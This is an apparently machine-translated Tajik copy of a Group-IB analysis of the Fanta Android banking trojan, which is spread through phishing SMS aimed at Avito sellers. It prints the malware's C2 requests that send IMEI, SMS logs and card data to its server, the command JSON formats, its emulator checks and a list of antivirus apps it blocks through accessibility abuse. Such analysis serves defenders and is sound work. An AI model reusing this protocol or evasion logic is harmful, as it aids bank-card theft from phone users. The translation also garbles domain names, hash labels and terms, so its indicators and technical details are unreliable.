🥇Leisya, Fanta: тактикаи нави трояни кӯҳнаи Android

Як рӯз шумо мехоҳед чизеро дар Avito фурӯшед ва пас аз интишори тавсифи муфассали маҳсулоти худ (масалан, модули RAM), шумо ин паёмро мегиред:

Вақте ки шумо истинодро мекушоед, шумо саҳифаи ба назар безарареро хоҳед дид, ки ба шумо, фурӯшандаи хушбахт ва муваффақ дар бораи хариди харид хабар медиҳад:

Вақте ки шумо тугмаи "Идома" -ро пахш мекунед, файли APK бо нишона ва номи эътимодбахш ба дастгоҳи Android-и шумо зеркашӣ карда мешавад. Шумо як барномаеро насб кардаед, ки бо ягон сабаб ҳуқуқи AccessibilityService-ро талаб мекард, пас якчанд тиреза пайдо шуд ва зуд нопадид шуд ва... Ҳамин аст.

Шумо барои тафтиши тавозуни худ меравед, аммо бо ягон сабаб барномаи бонкии шумо боз тафсилоти корти шуморо мепурсад. Пас аз ворид кардани маълумот, як чизи даҳшатнок рӯй медиҳад: бо ягон сабабе, ки барои шумо ҳанӯз норавшан аст, пул аз ҳисоби шумо нопадид мешавад. Шумо кӯшиш мекунед, ки мушкилотро ҳал кунед, аммо телефони шумо муқовимат мекунад: он тугмаҳои "Бозгашт" ва "Home" -ро пахш мекунад, хомӯш намешавад ва ба шумо имкон намедиҳад, ки ягон чораи бехатариро фаъол созед. Дар натича бе пул мемонед, моли шумо нахаридааст, сарсону саргардон мешавед: чй шуд?

Ҷавоб оддӣ аст: шумо қурбонии Android Trojan Fanta, узви оилаи Flexnet шудед. Ин чӣ гуна рӯй дод? Биёед ҳоло шарҳ диҳем.

Муаллифон: Андрей Половинкин, мутахассиси хурд оид ба таҳлили нармафзори зараровар, Иван Писарев, мутахассиси таҳлили нармафзори зараровар.

Баъзе омори

Оилаи Flexnet троянҳои Android бори аввал соли 2015 маълум шуд. Дар тӯли муддати тӯлонии фаъолият, оила ба якчанд зернамудҳо васеъ шуд: Фанта, Лимебот, Липтон ва ғайра. Троян, инчунин инфрасохтори бо он алоқаманд дар ҳоли ҳозир намеистад: схемаҳои нави самараноки тақсимот таҳия карда мешаванд - дар ҳолати мо, саҳифаҳои фишингии баландсифат ба як фурӯшандаи мушаххас нигаронида шудаанд ва таҳиягарони троян тамоюлҳои муд дар навиштани вирус - илова кардани функсияҳои нав, ки имкон медиҳад, ки пулро аз дастгоҳҳои сироятшуда самараноктар дуздида, механизмҳои муҳофизатиро давр зананд.

Маъракаи дар ин мақола тавсифшуда ба корбарони Русия нигаронида шудааст; шумораи ками дастгоҳҳои сироятшуда дар Украина ва ҳатто камтар аз Қазоқистон ва Беларус ба қайд гирифта шудаанд.

Гарчанде ки Flexnet зиёда аз 4 сол боз дар арсаи троянии Android қарор дорад ва аз ҷониби бисёре аз муҳаққиқон ба таври муфассал омӯхта шудааст, он ҳоло ҳам дар ҳолати хуб қарор дорад. Аз моҳи январи соли 2019, ҳаҷми эҳтимолии хисорот беш аз 35 миллион рублро ташкил медиҳад ва ин танҳо барои маъракаҳо дар Русия аст. Дар соли 2015 версияҳои гуногуни ин трояни Android дар форумҳои зеризаминӣ фурӯхта шуданд, ки дар онҷо рамзи сарчашмаи троянро бо тавсифи муфассал низ метавон ёфт. Ин маънои онро дорад, ки омори хисорот дар ҷаҳон боз ҳам таъсирбахштар аст. Барои чунин пирамард нишондихандаи бад нест, магар?

Аз фурӯш то фиреб

Тавре ки аз скриншоти қаблан пешниҳодшудаи саҳифаи фишинг барои хидмати интернетӣ барои ҷойгиркунии таблиғоти Avito дида мешавад, он барои як қурбонии мушаххас омода шудааст. Эҳтимол, ҳамлагарон яке аз таҳлилгарони Avito-ро истифода мебаранд, ки рақами телефон ва номи фурӯшанда ва инчунин тавсифи маҳсулотро истихроҷ мекунад. Пас аз васеъ кардани саҳифа ва омода кардани файли APK ба ҷабрдида СМС бо номи ӯ ва истинод ба саҳифаи фишинг фиристода мешавад, ки дар он тавсифи маҳсулот ва маблағи аз “фурӯш”-и маҳсулот гирифта шудааст. Бо пахш кардани тугма, корбар файли зараровари APK - Fanta -ро мегирад.

Омӯзиши домени shcet491[.]ru нишон дод, ки он ба серверҳои DNS Hostinger вакил шудааст:

ns1.hostinger.ru
ns2.hostinger.ru
ns3.hostinger.ru
ns4.hostinger.ru

Файли минтақаи домен дорои сабтҳо мебошад, ки ба суроғаҳои IP 31.220.23[.]236, 31.220.23[.]243 ва 31.220.23[.]235 ишора мекунанд. Бо вуҷуди ин, сабти манбаи ибтидоии домен (Сабт) ба сервере бо суроғаи IP 178.132.1[.]240 ишора мекунад.

Суроғаи IP 178.132.1[.]240 дар Нидерланд ҷойгир аст ва ба hoster тааллуқ дорад Ҷараёни Ҷаҳон. Суроғаҳои IP 31.220.23[.]235, 31.220.23[.]236 ва 31.220.23[.]243 дар Британияи Кабир ҷойгиранд ва ба сервери муштараки хостинги HOSTINGER тааллуқ доранд. Ҳамчун сабткунанда истифода мешавад openprov-ру. Доменҳои зерин инчунин ба суроғаи IP 178.132.1[.]240 ҳал карда шудаанд:

сделка-ру[.]ру
товар-ав[.]ру
ав-товар[.]ру
ру-сделка[.]ру
shcet382[.]ru
sdelka221[.]ru
sdelka211[.]ru
vyplata437[.]ru
viplata291[.]ru
перевод273[.]ру
перевод901[.]ру

Бояд қайд кард, ки истинодҳо дар формати зерин қариб аз ҳама доменҳо дастрас буданд:

http://(www.){0,1}<%domain%>/[0-9]{7}

Ин қолаб инчунин истиноди паёми SMS-ро дар бар мегирад. Дар асоси маълумоти таърихӣ, маълум шуд, ки як домен ба якчанд истинодҳои намунаи дар боло тавсифшуда мувофиқат мекунад, ки ин нишон медиҳад, ки як домен барои паҳн кардани Троян ба якчанд қурбониён истифода шудааст.

Биёед каме пеш равем: трояне, ки тавассути истиноди SMS зеркашӣ карда мешавад, суроғаро ҳамчун сервери назорат истифода мебарад onsedseddohap[.]клуб. Ин домен 2019-03-12 ба қайд гирифта шуд ва аз 2019-04-29, барномаҳои APK бо ин домен ҳамкорӣ карданд. Бар асоси маълумоти аз VirusTotal гирифташуда, ҳамагӣ 109 барнома бо ин сервер ҳамкорӣ карданд. Худи домен ба суроғаи IP ҳал карда шудааст 217.23.14[.]27, воқеъ дар Нидерландия ва моликияти щиморхона Ҷараёни Ҷаҳон. Ҳамчун сабткунанда истифода мешавад намак. Доменҳо низ ба ин суроғаи IP ҳал карда шудаанд клуби бад-ракон[.] (аз 2018) ва бад-ракон[.]зиндагй (аз 2018-10-25 сар карда). Бо домен клуби бад-ракон[.] зиёда аз 80 файлҳои APK бо онҳо ҳамкорӣ мекунанд бад-ракон[.]зиндагй - зиёда аз 100.

Умуман, ҳамла ба таври зерин пеш меравад:

Дар зери сарпӯши Фанта чӣ аст?

Мисли бисёре аз троянҳои дигари Android, Fanta қодир аст, ки паёмҳои SMS-ро хонд ва ирсол кунад, дархостҳои USSD кунад ва равзанаҳои худро дар болои барномаҳо (аз ҷумла барномаҳои бонкӣ) намоиш диҳад. Бо вуҷуди ин, арсенали функсионалии ин оила омад: Fanta ба истифода оғоз кард Хидмати дастрасӣ бо мақсадҳои гуногун: хондани мундариҷаи огоҳиномаҳо аз дигар замимаҳо, пешгирӣ кардани ошкор ва қатъ кардани иҷрои Троян дар дастгоҳи сироятшуда ва ғайра. Fanta дар ҳама версияҳои Android на камтар аз 4.4 кор мекунад. Дар ин мақола мо ба намунаи зерини Fanta муфассалтар назар хоҳем кард:

MD5: 0826bd11b2c130c4c8ac137e395ac2d4
ШАХНОМX: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
ШАХНОМX: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Дарҳол пас аз оғоз

Дарҳол пас аз оғозёбӣ, троян нишонаи худро пинҳон мекунад. Барнома танҳо дар сурате кор карда метавонад, ки агар номи дастгоҳи сироятшуда дар рӯйхат набошад:

андроид_х86
VirtualBox
Nexus 5X (барқарор)
Nexus 5 (риштарош)

Ин санҷиш дар хидмати асосии Троян анҷом дода мешавад - MainService. Вақте ки бори аввал ба кор андохта мешавад, параметрҳои конфигуратсияи барнома ба арзишҳои пешфарз оғоз карда мешаванд (формати нигоҳдории маълумоти конфигуратсия ва маънои онҳо баъдтар муҳокима карда мешавад) ва дастгоҳи нави сироятшуда дар сервери идоракунӣ ба қайд гирифта мешавад. Дархости HTTP POST бо навъи паём ба сервер фиристода мешавад сабти_бот ва маълумот дар бораи дастгоҳи сироятшуда (версияи Android, IMEI, рақами телефон, номи оператор ва рамзи кишваре, ки оператор дар он сабти ном шудааст). Суроға ҳамчун сервери назорат хизмат мекунад hXXp://onuseseddohap[.]club/controller.php. Дар посух, сервер паёме мефиристад, ки майдонҳоро дар бар мегирад bot_id, bot_pwd, сервер — барнома ин арзишҳоро ҳамчун параметрҳои сервери CnC захира мекунад. Параметр сервер ихтиёрӣ, агар майдон гирифта нашуда бошад: Fanta суроғаи бақайдгириро истифода мебарад - hXXp://onuseseddohap[.]club/controller.php. Функсияи тағир додани суроғаи CnC-ро барои ҳалли ду масъала истифода бурдан мумкин аст: барои тақсим кардани сарборӣ дар байни якчанд серверҳо (агар шумораи зиёди дастгоҳҳои сироятшуда вуҷуд дошта бошанд, сарбории веб-сервери оптимизатсияшуда метавонад зиёд бошад) ва инчунин барои истифода сервери алтернативӣ дар сурати нокомии яке аз серверҳои CnC.

Агар ҳангоми ирсоли дархост хатогӣ рух диҳад, троян пас аз 20 сония раванди бақайдгириро такрор мекунад.

Вақте ки дастгоҳ бомуваффақият ба қайд гирифта шуд, Fanta ба корбар паёми зеринро нишон медиҳад:

Шарҳи муҳим: хидмат занг зад Амнияти система — номи хидмати троянӣ ва пас аз пахш кардани тугма OK Равзанаи танзимоти дастрасии дастгоҳи сироятшуда кушода мешавад, ки дар он корбар бояд ҳуқуқи Дастрасиро барои хидмати зараровар диҳад:

Ҳамин ки корбар фаъол мешавад Хидмати дастрасӣ, Fanta ба мундариҷаи равзанаҳои барнома ва амалҳои дар онҳо иҷрошуда дастрасӣ пайдо мекунад:

Дарҳол пас аз гирифтани ҳуқуқҳои Дастрасӣ, Троян ҳуқуқҳои администратор ва ҳуқуқи хондани огоҳиномаҳоро дархост мекунад:

Бо истифода аз AccessibilityService, барнома зарбаҳои клавиатураро тақлид мекунад ва ба ин васила ба худ тамоми ҳуқуқҳои заруриро медиҳад.

Fanta якчанд мисолҳои махзани маълумотро (ки баъдтар тавсиф карда мешавад) эҷод мекунад, ки барои нигоҳ доштани маълумоти конфигуратсия заруранд, инчунин маълумоте, ки дар ҷараёни он дар бораи дастгоҳи сироятшуда ҷамъоварӣ шудааст. Барои фиристодани иттилооти ҷамъшуда, троян вазифаи такрориро эҷод мекунад, ки барои зеркашии майдонҳо аз пойгоҳи додаҳо ва гирифтани фармон аз сервери идоракунӣ пешбинӣ шудааст. Фосилаи дастрасӣ ба CnC вобаста ба версияи Android муқаррар карда мешавад: дар ҳолати 5.1, фосила 10 сония, дар акси ҳол 60 сония хоҳад буд.

Барои гирифтани фармон, Фанта дархост мекунад GetTask ба сервери идоракунӣ. Дар посух, CnC метавонад яке аз фармонҳои зеринро фиристад:

гурӯҳ	Шарҳи
0	SMS фиристед
1	Занг задан ё фармони USSD
2	Параметрро навсозӣ мекунад фосила
3	Параметрро навсозӣ мекунад даст кашидан
6	Параметрро навсозӣ мекунад sms Manager
9	Ҷамъоварии паёмҳои SMS оғоз кунед
11	Телефони худро ба танзимоти завод баргардонед
12	Сабти сабти эҷоди қуттии муколамаро фаъол/хомӯш кунед

Fanta инчунин огоҳиномаҳоро аз 70 барномаи бонкӣ, системаҳои пардохти зуд ва ҳамёнҳои электронӣ ҷамъоварӣ мекунад ва онҳоро дар пойгоҳи додаҳо нигоҳ медорад.

Нигоҳ доштани параметрҳои конфигуратсия

Барои нигоҳ доштани параметрҳои конфигуратсия, Fanta равиши стандартиро барои платформаи Android истифода мебарад - Preferences-файлҳо. Танзимот дар файле бо номи сабт карда мешавад танзимоти. Тавсифи параметрҳои захирашуда дар ҷадвали зер оварда шудааст.

ном	арзиши пешфарз	Арзишҳои имконпазир	Шарҳи
id	0	Тозакунӣ	ID бот
сервер	hXXp://onuseseddohap[.]club/	URL	Суроғаи серверро назорат кунед
pwd	-	сатр	Пароли сервер
фосила	20	Тозакунӣ	Фосилаи вақт. Нишон медиҳад, ки чӣ қадар вазифаҳои зерин бояд ба таъхир гузошта шаванд: Ҳангоми ирсоли дархост дар бораи ҳолати SMS-и ирсолшуда Гирифтани фармони нав аз сервери идоракунӣ
даст кашидан	ҳама	ҳама / рақами телефон	Агар майдон ба сатр баробар бошад ҳама ё рақами тел, пас паёми SMS-и қабулшуда аз ҷониби барнома боздошта мешавад ва ба корбар нишон дода намешавад
sms Manager	0	0/1	Барномаро ҳамчун қабулкунандаи пешфарз SMS фаъол/фаъол кунед
ReadDialog	бардурӯғ	Дуруст/дурӯғ	Бақайдгирии рӯйдодҳоро фаъол/хомӯш кунед Event Accessibility

Фанта инчунин файлро истифода мебарад sms Manager:

ном	арзиши пешфарз	Арзишҳои имконпазир	Шарҳи
pckg	-	сатр	Номи мудири паёми SMS истифода мешавад

Муносибат бо пойгоҳи додаҳо

Троян дар давоми кори худ ду базаи маълумотро истифода мебарад. Пойгоҳи додаҳо номгузорӣ шудааст a барои нигоҳ доштани маълумоти гуногуни аз телефон ҷамъшуда истифода мешавад. Базаи дуюм ном дорад fanta.db ва барои нигоҳ доштани танзимот, ки барои эҷоди тирезаҳои фишинг масъуланд, ки барои ҷамъоварии маълумот дар бораи кортҳои бонкӣ пешбинӣ шудаанд, истифода мешавад.

Троян аз пойгоҳи додаҳо истифода мебарад а Барои нигоҳ доштани маълумоти ҷамъшуда ва сабти амалҳои худ. Маълумот дар ҷадвал нигоҳ дошта мешавад гузоришҳо. Барои сохтани ҷадвал, дархости зерини SQL-ро истифода баред:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Дар базаи маълумот маълумоти зерин мавҷуд аст:

1. Сабти оғози дастгоҳи сироятшуда бо паём Телефон фаъол шуд!

2. Огоҳиномаҳо аз барномаҳо. Паём мувофиқи қолаби зерин тавлид мешавад:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Маълумоти корти бонкӣ аз шаклҳои фишинг, ки аз ҷониби Троян сохта шудааст. Параметр VIEW_NAME метавонад яке аз зерин бошад:

Садо Ояндасоз
Авито
Google Play
Дигар <%Номи барнома%>

Паём дар формат сабт карда мешавад:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. СМС-ҳои воридотӣ/беротӣ дар формати:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Маълумот дар бораи бастае, ки қуттии муколамаро дар формат месозад:

(<%Package name%>)<%Package information%>

Ҷадвали мисол гузоришҳо:

Яке аз функсияҳои Fanta ҷамъоварии маълумот дар бораи кортҳои бонкӣ мебошад. Ҷамъоварии маълумот тавассути эҷоди тирезаҳои фишинг ҳангоми кушодани барномаҳои бонкӣ сурат мегирад. Троян равзанаи фишингро танҳо як маротиба эҷод мекунад. Маълумоте, ки тиреза ба корбар нишон дода шудааст, дар ҷадвал нигоҳ дошта мешавад танзимоти дар пойгоҳи додаҳо fanta.db. Барои сохтани пойгоҳи додаҳо, дархости зерини SQL-ро истифода баред:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Ҳама майдонҳои ҷадвал танзимоти бо нобаёнӣ ба 1 оғоз карда шудааст (равзанаи фишинг эҷод кунед). Пас аз ворид кардани маълумотҳои корбар, арзиш ба 0 муқаррар карда мешавад. Намунаи майдонҳои ҷадвал танзимоти:

can_login — майдон барои намоиши форма ҳангоми кушодани аризаи бонкӣ масъул аст
бонки аввал - истифода нашудааст
can_avito — майдон барои намоиши форма хангоми кушодани замимаи Avito масъул аст
can_ali — майдон барои намоиши форма ҳангоми кушодани замимаи Aliexpress масъул аст
метавонад_дигар — майдон барои намоиши форма ҳангоми кушодани ягон барнома аз рӯйхат масъул аст: Yula, Pandao, Drom Auto, Wallet. Кортҳои тахфиф ва бонус, Aviasales, Booking, Trivago
can_card — майдон барои намоиши форма ҳангоми кушодан масъул аст Google Play

Мулоқот бо сервери идоракунӣ

Ҳамкории шабакавӣ бо сервери идоракунӣ тавассути протоколи HTTP сурат мегирад. Барои кор бо шабака, Fanta китобхонаи машҳури Retrofit -ро истифода мебарад. Дархостҳо ба суроғаҳои зерин фиристода мешаванд: hXXp://onuseseddohap[.]club/controller.php. Суроғаи серверро ҳангоми бақайдгирӣ дар сервер тағир додан мумкин аст. Кукиҳо метавонанд дар ҷавоб аз сервер фиристода шаванд. Fanta ба сервер дархостҳои зерин медиҳад:

Бақайдгирии бот дар сервери идоракунӣ як маротиба ҳангоми оғози аввал сурат мегирад. Маълумоти зерин дар бораи дастгоҳи сироятшуда ба сервер фиристода мешавад:
· Cookie — кукиҳои аз сервер гирифташуда (қимати пешфарз сатри холӣ аст)
· ҳолати - сатри доимӣ сабти_бот
· префикс — доимии бутун 2
· version_sdk — мувофиқи қолаби зерин ташкил карда мешавад: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· IMEI — IMEI дастгоҳи сироятшуда
· кишвар — рамзи кишваре, ки дар он оператор ба қайд гирифта шудааст, дар формати ISO
· шумора - рақами мобилӣ
· оператор — номи оператор

Намунаи дархосте, ки ба сервер фиристода шудааст:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
```
Дар посух ба дархост, сервер бояд объекти JSON-ро баргардонад, ки дорои параметрҳои зерин аст:
· bot_id — ID-и дастгоҳи сироятшуда. Агар bot_id ба 0 баробар бошад, Fanta дархостро дубора иҷро мекунад.
bot_pwd — парол барои сервер.
сервер — суроғаи серверро идора кунед. Параметри ихтиёрӣ. Агар параметр нишон дода нашавад, суроғаи дар барнома сабтшуда истифода мешавад.

Намунаи объекти JSON:
```
{
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}
```

Дархост барои гирифтани фармон аз сервер. Маълумоти зерин ба сервер фиристода мешавад:
· Cookie — кукиҳои аз сервер гирифташуда
· дархост — ID-и дастгоҳи сироятшуда, ки ҳангоми фиристодани дархост гирифта шудааст сабти_бот
· pwd — парол барои сервер
· divice_admin — майдон муайян мекунад, ки ҳуқуқҳои администратор гирифта шудаанд ё не. Агар ҳуқуқҳои администратор гирифта шуда бошанд, майдон ба он баробар аст 1, дар акси ҳол 0
· дастрасӣ — Ҳолати кори Хадамоти дастрасӣ. Агар хидмат оғоз шуда бошад, арзиши он аст 1, дар акси ҳол 0
· SMS Manager — нишон медиҳад, ки троян ҳамчун барномаи пешфарз барои қабули SMS фаъол аст ё не
· экран — нишон медиҳад, ки экран дар кадом ҳолат аст. Қимат муқаррар карда мешавад 1, агар экран фаъол бошад, дар акси ҳол 0;

Намунаи дархосте, ки ба сервер фиристода шудааст:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
```
Вобаста аз фармон, сервер метавонад объекти JSON-ро бо параметрҳои гуногун баргардонад:

· гурӯҳ SMS фиристед: Параметрҳо рақами телефон, матни паёми SMS ва ID-и паёми ирсолшавандаро дар бар мегиранд. Идентификатор ҳангоми фиристодани паём ба сервер бо навъи истифода мешавад setSmsStatus.
```
{
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}
```
· гурӯҳ Занг задан ё фармони USSD: Рақами телефон ё фармон дар мақоми ҷавоб меояд.
```
{
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}
```
· гурӯҳ Тағир додани параметри фосила.
```
{
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}
```
· гурӯҳ Тағир додани параметри intercept.
```
{
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}
```
· гурӯҳ Майдони SmsManager-ро тағир диҳед.
```
{
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```
· гурӯҳ Паёмҳои SMS-ро аз дастгоҳи сироятшуда ҷамъ кунед.
```
{
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}
```
· гурӯҳ Телефони худро ба танзимоти завод баргардонед:
```
{
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}
```
· гурӯҳ Тағир додани параметри ReadDialog.
```
{
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```

Ирсоли паём бо навъи setSmsStatus. Ин дархост пас аз иҷрои фармон дода мешавад SMS фиристед. Дархост чунин менамояд:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

Боркунии мундариҷаи пойгоҳи додаҳо. Як сатр барои як дархост интиқол дода мешавад. Маълумоти зерин ба сервер фиристода мешавад:
· Cookie — кукиҳои аз сервер гирифташуда
· ҳолати - сатри доимӣ setSaveInboxSms
· дархост — ID-и дастгоҳи сироятшуда, ки ҳангоми фиристодани дархост гирифта шудааст сабти_бот
· матн — матн дар сабти ҷории махзани маълумот (майдон d аз миз гузоришҳо дар пойгоҳи додаҳо а)
· шумора — номи сабти ҷории пойгоҳи додаҳо (майдон p аз миз гузоришҳо дар пойгоҳи додаҳо а)
· sms_mode - арзиши бутун (майдон m аз миз гузоришҳо дар пойгоҳи додаҳо а)

Дархост чунин менамояд:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
```
Агар бомуваффақият ба сервер фиристода шавад, сатр аз ҷадвал нест карда мешавад. Намунаи объекти JSON, ки аз ҷониби сервер баргардонида шудааст:
```
{
    "response":[],
    "status":"ok"
}
```

Мулоқот бо AccessibilityService

AccessibilityService барои осон кардани истифодаи дастгоҳҳои Android барои одамони дорои маълулият амалӣ карда шуд. Дар аксари мавридҳо, барои ҳамкорӣ бо барнома ҳамкории ҷисмонӣ лозим аст. AccessibilityService ба шумо имкон медиҳад, ки онҳоро ба таври барномавӣ иҷро кунед. Fanta ин хидматро барои эҷоди тирезаҳои қалбакӣ дар барномаҳои бонкӣ истифода мебарад ва корбаронро аз кушодани танзимоти система ва баъзе барномаҳо пешгирӣ мекунад.

Бо истифода аз функсияҳои AccessibilityService, троян тағиротро дар элементҳои экрани дастгоҳи сироятшуда назорат мекунад. Тавре ки қаблан тавсиф шудааст, танзимоти Fanta дорои як параметрест, ки барои сабти амалиёт бо қуттиҳои муколама масъул аст - ReadDialog. Агар ин параметр муқаррар карда шавад, маълумот дар бораи ном ва тавсифи бастае, ки ҳодисаро ба вуҷуд овард, ба пойгоҳи додаҳо илова карда мешавад. Троян ҳангоми сар задани рӯйдодҳо амалҳои зеринро иҷро мекунад:

Дар ҳолатҳои зерин пахш кардани тугмаҳои қафо ва хонаро тақлид мекунад:
· агар корбар мехоҳад дастгоҳи худро бозоғоз кунад
· агар корбар мехоҳад барномаи "Avito" -ро нест кунад ё ҳуқуқи дастрасиро тағир диҳад
· агар дар саҳифа зикри замимаи «Avito» бошад
· ҳангоми кушодани барномаи Google Play Protect
· ҳангоми кушодани саҳифаҳо бо танзимоти AccessibilityService
· вақте ки қуттии муколамаи Амнияти система пайдо мешавад
· ҳангоми кушодани саҳифа бо танзимоти "Дар болои замимаи дигар"
· ҳангоми кушодани саҳифаи "Барномаҳо", "Барқарорсозӣ ва барқарорсозӣ", "Бозсозии маълумот", "Танзимоти барқарорсозӣ", "Панели таҳиякунанда", "Махсус. Имкониятҳо», «Имкониятҳои махсус», «Ҳуқуқҳои махсус»
· агар ҳодиса аз ҷониби барномаҳои муайян тавлид шуда бошад.

Рӯйхати барномаҳо
- андроид
- Master Lite
- Устои тоза
- Устоди тоза барои CPU x86
- Идоракунии иҷозат барои барномаи Meizu
- Амнияти MIUI
- Устоди тоза - Антивирус, кэш ва тозакунандаи партов
- Назорати волидайн ва GPS: Kaspersky SafeKids
- Касперский Антивирус AppLock & Бета Амнияти Web
- Тозакунандаи вирус, Антивирус, Тозакунанда (MAX Security)
- Антивирусҳои мобилӣ PRO
- Анастируси Avast ва ҳифзи ройгон 2019
- Амнияти мобилӣ MegaFon
- Муҳофизати AVG барои Xperia
- Амнияти мобилӣ
- Антивирус ва муҳофизати зараровар
- Антивирус барои Android 2019
- Master Security - Антивирус, VPN, AppLock, Booster
- Антивируси AVG барои менеҷери системаи планшетии Huawei
- Дастрасии Samsung
- Менеҷери Smart Samsung
- Master Master
- Суръатбахш
- Доктор Веб
- Фазои амнияти Dr.Web
- Маркази идоракунии мобилии Dr.Web
- Dr.Web Security Space Life
- Маркази идоракунии мобилии Dr.Web
- Антивирус ва амнияти мобилӣ
- Kaspersky Internet Security: Антивирус ва муҳофизат
- Ҳаёти батареяи Касперский: Сарфа ва пурзӯр
- Kaspersky Endpoint Security - ҳифз ва идоракунӣ
- AVG Antivirus ройгон 2019 - Муҳофизат барои Android
- Антивирусҳои Android
- Norton Mobile Security ва Антивирус
- Антивирус, девор, VPN, амнияти мобилӣ
- Амнияти мобилӣ: антивирус, VPN, муҳофизати дуздӣ
- Антивирус барои Android
Агар ҳангоми фиристодани SMS ба рақами кӯтоҳ иҷозат талаб карда шавад, Фанта клик кардани қуттии қайдро тақлид мекунад Интихобро дар хотир доред ва тугма фиристодан.
Вақте ки шумо кӯшиш мекунед, ки ҳуқуқи администраторро аз Троян бигиред, он экрани телефонро қулф мекунад.
Илова кардани маъмурони навро пешгирӣ мекунад.
Агар барномаи антивирус dr.web таҳдидро ошкор кард, Фанта пахш кардани тугмаро тақлид мекунад сарфи назар кардан.
Троян пахшкунии тугмаи бозгашт ва хонаро тақлид мекунад, агар ҳодиса аз ҷониби барнома тавлид шуда бошад Нигоҳубини дастгоҳи Samsung.
Fanta тирезаҳои фишингро бо шаклҳои ворид кардани маълумот дар бораи кортҳои бонкӣ месозад, агар замима аз рӯйхати тақрибан 30 хидматҳои гуногуни интернетӣ ба кор андохта шавад. Дар байни онҳо: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto ва ғайра.

Шаклҳои фишинг

Фанта таҳлил мекунад, ки кадом барномаҳо дар дастгоҳи сироятшуда кор мекунанд. Агар замимаи манфиатдор кушода шуда бошад, троян дар болои ҳамаи дигарон равзанаи фишингро намоиш медиҳад, ки шакли ворид кардани маълумоти корти бонкӣ мебошад. Истифодабаранда бояд маълумоти зеринро ворид кунад:
- Шумораӣ карта
- Мӯҳлати анҷоми корт
- CVV
- Номи дорандаи корт (на барои ҳама бонкҳо)
Вобаста аз барномаи иҷрошаванда, равзанаҳои фишингҳои гуногун намоиш дода мешаванд. Дар зер намунаҳои баъзеи онҳо оварда шудаанд:

AliExpress:

Авито:

Барои баъзе барномаҳои дигар, масалан. Google Play Market, Aviasales, Pandao, Booking, Trivago:

Дар ҳақиқат чӣ гуна буд

Хушбахтона, шахсе, ки СМС-ро, ки дар аввали мақола тавсиф шудааст, гирифтааст, мутахассиси амнияти кибернӣ будааст. Аз ин рӯ, версияи воқеии режиссёрӣ аз оне, ки қаблан гуфта шуда буд, фарқ мекунад: шахс SMS-и ҷолиб гирифт ва пас аз он вай онро ба гурӯҳи Group-IB Threat Hunting Intelligence дод. Натиҷаи ҳамла ин мақола аст. Охири хушбахтона, дуруст? Бо вуҷуди ин, на ҳама ҳикояҳо ин қадар бомуваффақият ба охир мерасанд ва барои он ки шумо ба як режиссёр бо талафоти пул монанд нашавед, дар аксари ҳолатҳо риоя кардани қоидаҳои дарозмуддати зерин кофӣ аст:
- барномаҳоро барои дастгоҳи мобилии дорои OS Android аз ягон манбаъи ғайр аз Google Play насб накунед
- Ҳангоми насб кардани барнома, ба ҳуқуқҳои дархосткардаи барнома диққати махсус диҳед
- ба васеъшавии файлҳои зеркашида диққат диҳед
- навсозиҳои Android OS-ро мунтазам насб кунед
- захираҳои шубҳанокро дидан накунед ва файлҳоро аз он ҷо зеркашӣ накунед
- Истинодҳои дар паёмҳои SMS гирифташударо клик накунед.

Манбаъ: will.com

